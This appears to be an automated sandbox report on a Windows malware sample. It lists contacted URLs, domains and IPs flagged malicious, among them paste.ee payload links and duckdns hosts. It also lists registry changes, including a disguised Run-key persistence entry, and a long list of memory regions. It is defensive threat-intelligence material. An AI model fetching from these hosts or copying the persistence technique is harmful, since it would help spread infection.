C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 18 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://paste.ee/d/P0BOw/0
188.114.96.3
 malicious
https://simonastolerciuc.ro/images/server.txt
85.120.16.93
 malicious
2harbu03.duckdns.org
malicious
https://paste.ee/d/FwIIK/0
188.114.96.3
 malicious
https://paste.ee/d/9xfVr/0
188.114.96.3
 malicious
http://www.imvu.comr
unknown
http://ftp.desckvbrat.com.br
unknown
http://desckvbrat.com.br
unknown
https://contoso.com/License
unknown
https://paste.ee/d/P0BOw/0P
unknown
https://analytics.paste.ee
unknown
https://paste.ee
unknown
https://aka.ms/pscore6
unknown
https://pastebin.com/raw/pQQ0n3eA
104.20.4.235
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
https://www.google.com
unknown
http://crl.microso$
unknown
http://crl.microso
unknown
http://geoplugin.net/json.gp/C
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://login.yahoo.com/config/login
unknown
https://cdnjs.cloudflare.com
unknown
http://crl.micft.cMicRosof
unknown
https://cdnjs.cloudflare.com;
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://go.microsoft.cos$?CL
unknown
http://crl.microso$$
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://simonastolerciuc.ro
unknown
http://simonastolerciuc.ro
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://paste.ee
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://www.google.com;
unknown
http://crl.mic
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
http://www.microsoft.
unknown
https://github.com/Pester/Pester
unknown
https://simonastolerciuc.ro/images/sp
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://schemas.xmlsoap.org/wsdl/
unknown
https://analytics.paste.ee;
unknown
https://www.google.com/accounts/servicelogin
unknown
https://paste.ee/d/9xfVr/0P
unknown
https://aka.ms/pscore68
unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlP
unknown
https://pastebin.com
unknown
https://themes.googleusercontent.com
unknown
https://oneget.org
unknown
http://www.ebuddy.com
unknown
There are 48 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
paste.ee
188.114.96.3
 malicious
janbours92harbu04.duckdns.org
172.111.244.100
 malicious
desckvbrat.com.br
191.252.83.213
 malicious
simonastolerciuc.ro
85.120.16.93
 malicious
pastebin.com
104.20.4.235
 malicious
janbours92harbu03.duckdns.org
192.169.69.26
 malicious
ftp.desckvbrat.com.br
unknown
 malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
85.120.16.93
simonastolerciuc.ro
Romania
malicious
104.20.4.235
pastebin.com
United States
malicious
172.111.244.100
janbours92harbu04.duckdns.org
United States
malicious
188.114.96.3
paste.ee
European Union
malicious
191.252.83.213
desckvbrat.com.br
Brazil
malicious
192.169.69.26
janbours92harbu03.duckdns.org
United States
malicious
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Update Drivers NVIDEO_khx
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Rmc-NACZDT
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-NACZDT
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-NACZDT
time
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
There are 11 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
C38000
heap
page read and write
 malicious
400000
remote allocation
page execute and read and write
 malicious
21A90402000
trusted library allocation
page read and write
 malicious
16510402000
trusted library allocation
page read and write
 malicious
C28000
heap
page read and write
 malicious
1F1F6B21000
trusted library allocation
page read and write
 malicious
21A90011000
trusted library allocation
page read and write
 malicious
197AAB82000
trusted library allocation
page read and write
 malicious
26BF000
stack
page read and write
 malicious
A48000
heap
page read and write
 malicious
1650022C000
trusted library allocation
page read and write
914B83E000
stack
page read and write
13680B9B000
trusted library allocation
page read and write
331C000
heap
page read and write
21A80B2F000
trusted library allocation
page read and write
13680CC0000
trusted library allocation
page read and write
7DC000
stack
page read and write
7FF848F84000
trusted library allocation
page read and write
1DF2552A000
heap
page read and write
136F38B0000
heap
page read and write
197ABD28000
trusted library allocation
page read and write
1F1FEBE0000
heap
page read and write
7FF848F90000
trusted library allocation
page read and write
197AA872000
heap
page read and write
35AE000
stack
page read and write
423F000
stack
page read and write
1DF25558000
heap
page read and write
7FF848EB0000
trusted library allocation
page read and write
197C2E20000
heap
page execute and read and write
330F000
heap
page read and write
13680B1C000
trusted library allocation
page read and write
10000000
direct allocation
page read and write
210C02F4000
heap
page read and write
7FF848CD6000
trusted library allocation
page read and write
210C0285000
heap
page read and write
E70000
heap
page read and write
8FA2F7E000
stack
page read and write
18245EB2000
trusted library allocation
page read and write
1ED32E3000
stack
page read and write
50AE3CE000
stack
page read and write
13680CF0000
trusted library allocation
page read and write
197AC253000
trusted library allocation
page read and write
7FF848F60000
trusted library allocation
page read and write
C30000
heap
page read and write
13680CBB000
trusted library allocation
page read and write
21AF2890000
heap
page read and write
13680C72000
trusted library allocation
page read and write
B1DB3FE000
stack
page read and write
3313000
heap
page read and write
197A8D60000
heap
page read and write
18246CC7000
trusted library allocation
page read and write
1F1E4930000
heap
page read and write
474000
remote allocation
page execute and read and write
7FF848D00000
trusted library allocation
page execute and read and write
18246BE2000
trusted library allocation
page read and write
7FF848EB0000
trusted library allocation
page read and write
21AF45AC000
heap
page read and write
1368014D000
trusted library allocation
page read and write
1D6280C6000
heap
page read and write
456000
system
page execute and read and write
197AA5E0000
heap
page readonly
1F1E4880000
heap
page read and write
197AA8BE000
heap
page read and write
7BE000
stack
page read and write
136F3CF0000
heap
page read and write
7FF848F20000
trusted library allocation
page read and write
50AD379000
stack
page read and write
1F1FEAE0000
heap
page read and write
1A545FE000
stack
page read and write
1DF25705000
heap
page read and write
7FF848EC0000
trusted library allocation
page read and write
210C03E3000
trusted library allocation
page read and write
AF2000
stack
page read and write
197BAC4D000
trusted library allocation
page read and write
914BB3E000
stack
page read and write
210C1DD7000
trusted library allocation
page read and write
1DF25511000
heap
page read and write
7FF848E20000
trusted library allocation
page execute and read and write
136F1A0D000
heap
page read and write
16510080000
trusted library allocation
page read and write
1DF25558000
heap
page read and write
1D62B2D7000
trusted library allocation
page read and write
1DF25757000
heap
page read and write
18246CEE000
trusted library allocation
page read and write
32E1000
heap
page read and write
197A8C16000
heap
page read and write
210C0330000
trusted library allocation
page read and write
7FF848E40000
trusted library allocation
page read and write
31AE000
stack
page read and write
1ED38FF000
stack
page read and write
13680CE2000
trusted library allocation
page read and write
16500926000
trusted library allocation
page read and write
7FF848DE0000
trusted library allocation
page execute and read and write
2DF0000
heap
page read and write
7FF848CFC000
trusted library allocation
page execute and read and write
8FA2FFE000
stack
page read and write
13680B83000
trusted library allocation
page read and write
13680CE7000
trusted library allocation
page read and write
7FF84907D000
trusted library allocation
page read and write
7FF848E40000
trusted library allocation
page read and write
316BAFF000
stack
page read and write
1F1E6290000
heap
page readonly
5480000
heap
page read and write
13680C8F000
trusted library allocation
page read and write
197A8BD1000
heap
page read and write
4030000
heap
page read and write
3305000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
50AE5CE000
stack
page read and write
1DF259F1000
heap
page read and write
3335000
heap
page read and write
13680BD8000
trusted library allocation
page read and write
26EC000
heap
page read and write
1D62808D000
heap
page read and write
1D641F6F000
heap
page read and write
8FC000
stack
page read and write
33FE000
stack
page read and write
7FF848CDC000
trusted library allocation
page execute and read and write
210C0190000
heap
page read and write
16510011000
trusted library allocation
page read and write
21AF24F8000
heap
page read and write
1D62809F000
heap
page read and write
7FF848F60000
trusted library allocation
page read and write
1D641EE0000
heap
page read and write
1D642080000
heap
page execute and read and write
182452CA000
heap
page read and write
13680C4C000
trusted library allocation
page read and write
13680C39000
trusted library allocation
page read and write
1DF254F0000
heap
page read and write
1A54475000
stack
page read and write
93E000
stack
page read and write
13680220000
trusted library allocation
page read and write
210C2983000
trusted library allocation
page read and write
1369007F000
trusted library allocation
page read and write
7FF849020000
trusted library allocation
page read and write
7FF848F63000
trusted library allocation
page read and write
7FF848E12000
trusted library allocation
page read and write
1D628040000
heap
page read and write
3321000
heap
page read and write
7FF848C24000
trusted library allocation
page read and write
7FF848DD2000
trusted library allocation
page read and write
1D62B27D000
trusted library allocation
page read and write
AC595FF000
stack
page read and write
7FF848C62000
trusted library allocation
page read and write
32EA000
heap
page read and write
7FF848F92000
trusted library allocation
page read and write
7FF848E70000
trusted library allocation
page read and write
7FF848F00000
trusted library allocation
page read and write
3B46000
heap
page read and write
210C044E000
heap
page read and write
7FF848E80000
trusted library allocation
page read and write
7FF848F80000
trusted library allocation
page read and write
7FF848C3D000
trusted library allocation
page execute and read and write
7FF848E60000
trusted library allocation
page read and write
7FF848F40000
trusted library allocation
page read and write
197BA991000
trusted library allocation
page read and write
13680BAC000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
1F1F6920000
trusted library allocation
page read and write
197AB3B2000
trusted library allocation
page read and write
21AF257B000
heap
page read and write
1FD8238B000
heap
page read and write
1DF25769000
heap
page read and write
7FF848F30000
trusted library allocation
page read and write
7FF848ED0000
trusted library allocation
page read and write
32EB000
heap
page read and write
AC58F9A000
stack
page read and write
197C3151000
heap
page read and write
13680C2C000
trusted library allocation
page read and write
1D62B5E9000
trusted library allocation
page read and write
32D8000
heap
page read and write
B1DB83F000
stack
page read and write
400000
system
page execute and read and write
210DA2F0000
heap
page read and write
1A54B3C000
stack
page read and write
1DF2577F000
heap
page read and write
18245461000
trusted library allocation
page read and write
50ACFBE000
unkown
page read and write
1D62B65A000
trusted library allocation
page read and write
1A546FE000
stack
page read and write
7FF848ED0000
trusted library allocation
page read and write
459000
system
page execute and read and write
32E8000
heap
page read and write
1656BA46000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
7FF848E40000
trusted library allocation
page read and write
B1DB4FE000
stack
page read and write
8FA3F0E000
stack
page read and write
18243750000
heap
page read and write
1825DACA000
heap
page read and write
21AF2594000
heap
page read and write
7FF848C24000
trusted library allocation
page read and write
1A5467D000
stack
page read and write
1F1FEAD0000
heap
page execute and read and write
1D62B873000
trusted library allocation
page read and write
13680D0A000
trusted library allocation
page read and write
7FF848D1C000
trusted library allocation
page execute and read and write
7FF848C3D000
trusted library allocation
page execute and read and write
3324000
heap
page read and write
136F3998000
heap
page read and write
7FF848E50000
trusted library allocation
page read and write
316C74C000
stack
page read and write
7FF848ED0000
trusted library allocation
page read and write
1A549BF000
stack
page read and write
1DF25558000
heap
page read and write
7FF848D46000
trusted library allocation
page execute and read and write
1DF254D7000
heap
page read and write
7FF848E50000
trusted library allocation
page read and write
197AB9C0000
trusted library allocation
page read and write
7FF848E22000
trusted library allocation
page read and write
50AD7FE000
stack
page read and write
210C1D51000
trusted library allocation
page read and write
13680ADD000
trusted library allocation
page read and write
30FB000
stack
page read and write
7FF848D80000
trusted library allocation
page execute and read and write
1650054E000
trusted library allocation
page read and write
1D63A014000
trusted library allocation
page read and write
13680D5F000
trusted library allocation
page read and write
21AF47E3000
heap
page read and write
210C35E9000
trusted library allocation
page read and write
7FF848CF0000
trusted library allocation
page execute and read and write
3321000
heap
page read and write
21AF4640000
heap
page execute and read and write
332A000
heap
page read and write
50AD2FF000
stack
page read and write
547F000
stack
page read and write
50AD678000
stack
page read and write
7FF848F90000
trusted library allocation
page read and write
7DF4DF420000
trusted library allocation
page execute and read and write
1FD82330000
heap
page read and write
1D62A194000
trusted library allocation
page read and write
F10000
heap
page read and write
7FF848DC0000
trusted library allocation
page read and write
21A80725000
trusted library allocation
page read and write
B40000
heap
page read and write
27D0000
heap
page read and write
E90000
heap
page read and write
32D4000
heap
page read and write
7A55A7F000
stack
page read and write
330F000
heap
page read and write
1F1E490C000
heap
page read and write
36FE000
stack
page read and write
197A8DB0000
heap
page read and write
1656D8ED000
heap
page read and write
3312000
heap
page read and write
1DF25533000
heap
page read and write
343E000
stack
page read and write
197AC73E000
trusted library allocation
page read and write
914BABC000
stack
page read and write
3302000
heap
page read and write
1F1FE91E000
heap
page read and write
32FE000
stack
page read and write
7FF848EA0000
trusted library allocation
page read and write
914B93B000
stack
page read and write
7DF482D90000
trusted library allocation
page execute and read and write
7FF848D20000
trusted library allocation
page execute and read and write
7FF848EF0000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
13680D18000
trusted library allocation
page read and write
7FF848CE6000
trusted library allocation
page read and write
13680C8A000
trusted library allocation
page read and write
23445B74000
heap
page read and write
1824537E000
heap
page read and write
1824532E000
heap
page read and write
21AF2894000
heap
page read and write
188F000
stack
page read and write
3850000
heap
page read and write
21AF46B0000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
1DF257F0000
heap
page read and write
18245250000
trusted library allocation
page read and write
1DF25558000
heap
page read and write
21AF47AC000
heap
page read and write
136F1910000
heap
page read and write
1F1E6FF4000
trusted library allocation
page read and write
7FF848DFA000
trusted library allocation
page read and write
B40000
heap
page read and write
1F1E47F0000
heap
page read and write
3329000
heap
page read and write
1825DA74000
heap
page read and write
210C0440000
heap
page read and write
13680C43000
trusted library allocation
page read and write
136F3AC0000
heap
page execute and read and write
1D639D5F000
trusted library allocation
page read and write
7FF848F20000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page read and write
197C3095000
heap
page read and write
210C0434000
heap
page read and write
21AF2597000
heap
page read and write
197AC783000
trusted library allocation
page read and write
1656D95E000
heap
page read and write
1F1E6B20000
trusted library allocation
page read and write
165004A9000
trusted library allocation
page read and write
7FF848C30000
trusted library allocation
page read and write
7FF848C3D000
trusted library allocation
page execute and read and write
1A557CD000
stack
page read and write
16500001000
trusted library allocation
page read and write
7FF848F9C000
trusted library allocation
page read and write
7FF848F40000
trusted library allocation
page read and write
26F0000
heap
page read and write
32E1000
heap
page read and write
1330000
heap
page read and write
1F1E62A0000
trusted library allocation
page read and write
900000
heap
page read and write
50AD3FE000
stack
page read and write
7FF848C2D000
trusted library allocation
page execute and read and write
1DF23814000
heap
page read and write
210C0208000
heap
page read and write
1D629F4F000
trusted library allocation
page read and write
197ABA24000
trusted library allocation
page read and write
21AF4520000
trusted library section
page read and write
13681046000
trusted library allocation
page read and write
210C0444000
heap
page read and write
1656DB80000
heap
page execute and read and write
31B6000
heap
page read and write
197ABAC1000
trusted library allocation
page read and write
7E5000
heap
page read and write
3FAF000
stack
page read and write
AC599FE000
stack
page read and write
8FA2E7E000
stack
page read and write
197AC1CA000
trusted library allocation
page read and write
1F1F68C9000
trusted library allocation
page read and write
1D639D2D000
trusted library allocation
page read and write
210DA221000
heap
page read and write
7FF848EA0000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
197C3158000
heap
page read and write
197A8DD0000
heap
page read and write
1F1E46B0000
heap
page read and write
914B4FE000
stack
page read and write
136F3E20000
heap
page read and write
136F3AEF000
heap
page read and write
210C35BE000
trusted library allocation
page read and write
165004DD000
trusted library allocation
page read and write
136F1810000
heap
page read and write
7FF848CE6000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page read and write
7C0000
heap
page read and write
1D62B5D7000
trusted library allocation
page read and write
7FF848F00000
trusted library allocation
page read and write
1F1FEC32000
heap
page read and write
7FF848E30000
trusted library allocation
page read and write
197AA961000
trusted library allocation
page read and write
32E8000
heap
page read and write
197ABC09000
trusted library allocation
page read and write
7FF848EB0000
trusted library allocation
page read and write
182454D5000
trusted library allocation
page read and write
13680BE0000
trusted library allocation
page read and write
E10000
heap
page read and write
32FF000
heap
page read and write
1824353D000
heap
page read and write
7FF848F20000
trusted library allocation
page read and write
914B47F000
stack
page read and write
1DF256FB000
heap
page read and write
3303000
heap
page read and write
1FD82634000
heap
page read and write
7FF848F90000
trusted library allocation
page execute and read and write
1656B980000
heap
page read and write
7FF848DE1000
trusted library allocation
page read and write
197ABC9E000
trusted library allocation
page read and write
1656D8C5000
heap
page read and write
914B77D000
stack
page read and write
7FF848EE0000
trusted library allocation
page read and write
7FF848DDA000
trusted library allocation
page read and write
18255481000
trusted library allocation
page read and write
210D1DC4000
trusted library allocation
page read and write
7FF848D50000
trusted library allocation
page execute and read and write
32E8000
heap
page read and write
7FF848F80000
trusted library allocation
page read and write
18246748000
trusted library allocation
page read and write
1FD82630000
heap
page read and write
7FF848D60000
trusted library allocation
page execute and read and write
7FF848C63000
trusted library allocation
page execute and read and write
7FF848EF0000
trusted library allocation
page read and write
7FF848E64000
trusted library allocation
page read and write
1DF255DC000
heap
page read and write
B1DB636000
stack
page read and write
182435FD000
heap
page read and write
1FD82635000
heap
page read and write
1D62B62D000
trusted library allocation
page read and write
1FD82670000
heap
page read and write
21A80891000
trusted library allocation
page read and write
7FF848DD2000
trusted library allocation
page read and write
1656B9B8000
heap
page read and write
7FF848C3D000
trusted library allocation
page execute and read and write
7FF848C32000
trusted library allocation
page read and write
1D628052000
heap
page read and write
197AAE2E000
trusted library allocation
page read and write
316B679000
stack
page read and write
7FF848E50000
trusted library allocation
page read and write
7A55DFE000
stack
page read and write
8FA333F000
stack
page read and write
7FF848E18000
trusted library allocation
page read and write
1825DA00000
heap
page read and write
1DF254D1000
heap
page read and write
210C38C7000
trusted library allocation
page read and write
316B879000
stack
page read and write
136F3A07000
heap
page execute and read and write
A20000
heap
page read and write
1368101F000
trusted library allocation
page read and write
316BB7C000
stack
page read and write
7FF848E50000
trusted library allocation
page execute and read and write
1DF2573D000
heap
page read and write
16500738000
trusted library allocation
page read and write
197AA5F0000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page read and write
1D641F75000
heap
page read and write
1DF25558000
heap
page read and write
7FF848F89000
trusted library allocation
page read and write
3E60000
heap
page read and write
7FF848CE0000
trusted library allocation
page read and write
1ED336E000
stack
page read and write
13680A0E000
trusted library allocation
page read and write
B1DB5BF000
stack
page read and write
A80000
heap
page read and write
13680B41000
trusted library allocation
page read and write
1F1E4937000
heap
page read and write
3270000
heap
page read and write
21AF45BF000
heap
page read and write
3313000
heap
page read and write
13680B26000
trusted library allocation
page read and write
7FF848C33000
trusted library allocation
page execute and read and write
8FA33BE000
stack
page read and write
7EC000
stack
page read and write
7FF848E60000
trusted library allocation
page read and write
21AF4680000
heap
page execute and read and write
7FF848CD0000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page read and write
13680CE0000
trusted library allocation
page read and write
1DF25589000
heap
page read and write
1656D460000
trusted library allocation
page read and write
7FF848EF0000
trusted library allocation
page read and write
197AB98F000
trusted library allocation
page read and write
210C03A0000
heap
page execute and read and write
210DA218000
heap
page read and write
7FF848E60000
trusted library allocation
page read and write
210C0430000
heap
page read and write
1F1FEAD6000
heap
page execute and read and write
136F3320000
heap
page read and write
7FF848F50000
trusted library allocation
page read and write
7FF848F70000
trusted library allocation
page read and write
21AF4000000
heap
page execute and read and write
1825DA77000
heap
page read and write
18244F20000
trusted library allocation
page read and write
E50000
heap
page read and write
8FA2BCF000
stack
page read and write
B48000
heap
page read and write
7FF848DEA000
trusted library allocation
page read and write
136F1B70000
heap
page read and write
1D628274000
heap
page read and write
1D6421FC000
heap
page read and write
11D0000
heap
page read and write
7FF848E11000
trusted library allocation
page read and write
AFC000
stack
page read and write
7FF848E25000
trusted library allocation
page read and write
1ED377C000
stack
page read and write
316C64E000
stack
page read and write
18247261000
trusted library allocation
page read and write
55CF000
stack
page read and write
316B4FF000
unkown
page read and write
1F1E493D000
heap
page read and write
7FF848EB0000
trusted library allocation
page read and write
2D8B000
stack
page read and write
1DF23A0C000
heap
page read and write
1A5477E000
stack
page read and write
7FF848CE0000
trusted library allocation
page execute and read and write
1DF25501000
heap
page read and write
21AF47D2000
heap
page read and write
197ABB3D000
trusted library allocation
page read and write
7FF848EE0000
trusted library allocation
page read and write
1DF23A08000
heap
page read and write
7FF848F30000
trusted library allocation
page read and write
332A000
heap
page read and write
7FF848F30000
trusted library allocation
page read and write
471000
remote allocation
page execute and read and write
197AA950000
heap
page execute and read and write
197ABC6A000
trusted library allocation
page read and write
28BF000
stack
page read and write
1DF237F7000
heap
page read and write
197C2E70000
trusted library allocation
page read and write
1DF23770000
heap
page read and write
182436F0000
heap
page read and write
7FF848E00000
trusted library allocation
page execute and read and write
21AF4686000
heap
page execute and read and write
F34831D000
stack
page read and write
32C8000
heap
page read and write
18246639000
trusted library allocation
page read and write
1DF2574E000
heap
page read and write
1F1E6D5B000
trusted library allocation
page read and write
1DF23760000
heap
page read and write
21A90281000
trusted library allocation
page read and write
7FF848F00000
trusted library allocation
page read and write
197BAC6B000
trusted library allocation
page read and write
1DF256F1000
heap
page read and write
18246582000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page read and write
7FF848C3B000
trusted library allocation
page read and write
1D627F70000
heap
page read and write
182450A0000
trusted library allocation
page read and write
165004B5000
trusted library allocation
page read and write
7FF848E50000
trusted library allocation
page read and write
197A8B98000
heap
page read and write
7FF848CE6000
trusted library allocation
page read and write
1DF237F7000
heap
page read and write
21AF2450000
heap
page read and write
7FF848F70000
trusted library allocation
page read and write
7FF848E05000
trusted library allocation
page read and write
7FF848E40000
trusted library allocation
page read and write
197A8BAE000
heap
page read and write
197A8D80000
heap
page read and write
210DA2B3000
heap
page read and write
1D62B64F000
trusted library allocation
page read and write
7FF848E1A000
trusted library allocation
page read and write
7A55B79000
stack
page read and write
13680191000
trusted library allocation
page read and write
7FF848F20000
trusted library allocation
page read and write
32F2000
heap
page read and write
1F1E6F72000
trusted library allocation
page read and write
1656D8A0000
heap
page read and write
1824354A000
heap
page read and write
23445860000
heap
page read and write
18244F94000
heap
page read and write
1F1E6890000
heap
page execute and read and write
1D639E3E000
trusted library allocation
page read and write
16500754000
trusted library allocation
page read and write
210D202B000
trusted library allocation
page read and write
210DA44F000
heap
page read and write
1FD82300000
heap
page read and write
210DA2D0000
heap
page read and write
7FF848F80000
trusted library allocation
page read and write
7FF848EE0000
trusted library allocation
page read and write
50AD77E000
stack
page read and write
331B000
heap
page read and write
3D0C000
unkown
page read and write
1DF25A8C000
heap
page read and write
54CE000
stack
page read and write
1656BB65000
heap
page read and write
1FD82380000
heap
page read and write
1656DC80000
heap
page read and write
136F38A0000
heap
page read and write
1DF25529000
heap
page read and write
136F1A9C000
heap
page read and write
A40000
heap
page read and write
AC59BFE000
stack
page read and write
CF2000
heap
page read and write
316B9F9000
stack
page read and write
32E8000
heap
page read and write
1656B880000
heap
page read and write
7FF848C33000
trusted library allocation
page execute and read and write
13680AF5000
trusted library allocation
page read and write
1F1E6DC4000
trusted library allocation
page read and write
13680C84000
trusted library allocation
page read and write
1D642190000
heap
page read and write
7FF848F50000
trusted library allocation
page read and write
7FF848C43000
trusted library allocation
page execute and read and write
1DF2556D000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
7FF848CD6000
trusted library allocation
page read and write
3307000
heap
page read and write
7FF848C34000
trusted library allocation
page read and write
197AA859000
heap
page read and write
7FF848C4B000
trusted library allocation
page read and write
B1DAFFE000
stack
page read and write
197C3043000
heap
page read and write
7FF848EE0000
trusted library allocation
page read and write
13680C18000
trusted library allocation
page read and write
1656D860000
trusted library allocation
page read and write
13680549000
trusted library allocation
page read and write
7FF848DEA000
trusted library allocation
page read and write
7FF8490B0000
trusted library allocation
page read and write
1656D9A0000
heap
page read and write
7FF848E15000
trusted library allocation
page read and write
1DF25877000
heap
page read and write
13680197000
trusted library allocation
page read and write
1DF25721000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
197C310A000
heap
page read and write
1DF25559000
heap
page read and write
21A804BB000
trusted library allocation
page read and write
13680BE6000
trusted library allocation
page read and write
21AF3F40000
trusted library allocation
page read and write
1F1E6DBC000
trusted library allocation
page read and write
7A55BF7000
stack
page read and write
23445820000
heap
page read and write
50AD87C000
stack
page read and write
7FF848EF0000
trusted library allocation
page read and write
3302000
heap
page read and write
1650052C000
trusted library allocation
page read and write
7FF848E00000
trusted library allocation
page execute and read and write
7FF848E40000
trusted library allocation
page read and write
7FF848EF0000
trusted library allocation
page read and write
13680B1F000
trusted library allocation
page read and write
13680AD7000
trusted library allocation
page read and write
197BA981000
trusted library allocation
page read and write
13680C9A000
trusted library allocation
page read and write
197AA85B000
heap
page read and write
3324000
heap
page read and write
7FF848C4B000
trusted library allocation
page read and write
3315000
heap
page read and write
13680BEE000
trusted library allocation
page read and write
136F1B50000
trusted library allocation
page read and write
210C0289000
heap
page read and write
7FF848EA0000
trusted library allocation
page read and write
914B8B8000
stack
page read and write
37FB000
stack
page read and write
1656BA67000
heap
page read and write
16500490000
trusted library allocation
page read and write
1656DC76000
heap
page execute and read and write
1DF25558000
heap
page read and write
18243589000
heap
page read and write
11ED000
heap
page read and write
210DA440000
heap
page read and write
13680151000
trusted library allocation
page read and write
3FEE000
stack
page read and write
13680A53000
trusted library allocation
page read and write
316B1CF000
stack
page read and write
13680BC9000
trusted library allocation
page read and write
7FF848CEC000
trusted library allocation
page execute and read and write
7FF848EF0000
trusted library allocation
page read and write
182434B0000
heap
page read and write
210DA1C7000
heap
page execute and read and write
2ABE000
stack
page read and write
1F1E4978000
heap
page read and write
1A544FF000
stack
page read and write
1656DB70000
heap
page execute and read and write
1ED3C3E000
stack
page read and write
B40000
heap
page read and write
1368007E000
trusted library allocation
page read and write
7FF848E42000
trusted library allocation
page read and write
1DF25737000
heap
page read and write
7FF848C40000
trusted library allocation
page read and write
18255461000
trusted library allocation
page read and write
13680C20000
trusted library allocation
page read and write
B1DB2FF000
stack
page read and write
7FF848F80000
trusted library allocation
page read and write
AD6000
stack
page read and write
914B9BE000
stack
page read and write
3324000
heap
page read and write
23445A30000
heap
page read and write
1825DAA4000
heap
page read and write
32E0000
heap
page read and write
1D62A107000
trusted library allocation
page read and write
1656D480000
trusted library allocation
page read and write
7FF848CE0000
trusted library allocation
page read and write
3327000
heap
page read and write
8FA32BB000
stack
page read and write
7FF848E60000
trusted library allocation
page read and write
1D642201000
heap
page read and write
13680BBF000
trusted library allocation
page read and write
18255470000
trusted library allocation
page read and write
1DF25757000
heap
page read and write
1D627E90000
heap
page read and write
7FF848D26000
trusted library allocation
page execute and read and write
13680B4A000
trusted library allocation
page read and write
332D000
heap
page read and write
13680C37000
trusted library allocation
page read and write
313E000
stack
page read and write
7FF848D40000
trusted library allocation
page execute and read and write
8FA307E000
stack
page read and write
1824530D000
heap
page read and write
1A54BBE000
stack
page read and write
7FF848E18000
trusted library allocation
page read and write
1825DA7E000
heap
page read and write
1DF25558000
heap
page read and write
13680B89000
trusted library allocation
page read and write
13680D11000
trusted library allocation
page read and write
18243542000
heap
page read and write
7FF848CE6000
trusted library allocation
page read and write
21A80492000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page execute and read and write
1F1E6D38000
trusted library allocation
page read and write
1540000
heap
page read and write
1D628111000
heap
page read and write
21A80232000
trusted library allocation
page read and write
AC59AFF000
stack
page read and write
182464F2000
trusted library allocation
page read and write
50AD97B000
stack
page read and write
1D62A135000
trusted library allocation
page read and write
7A557FF000
stack
page read and write
1A54A37000
stack
page read and write
7FF848FA0000
trusted library allocation
page read and write
BCD000
stack
page read and write
1F1E6280000
trusted library allocation
page read and write
197AB9F8000
trusted library allocation
page read and write
50AE34E000
stack
page read and write
13680697000
trusted library allocation
page read and write
7FF848E80000
trusted library allocation
page read and write
197AB963000
trusted library allocation
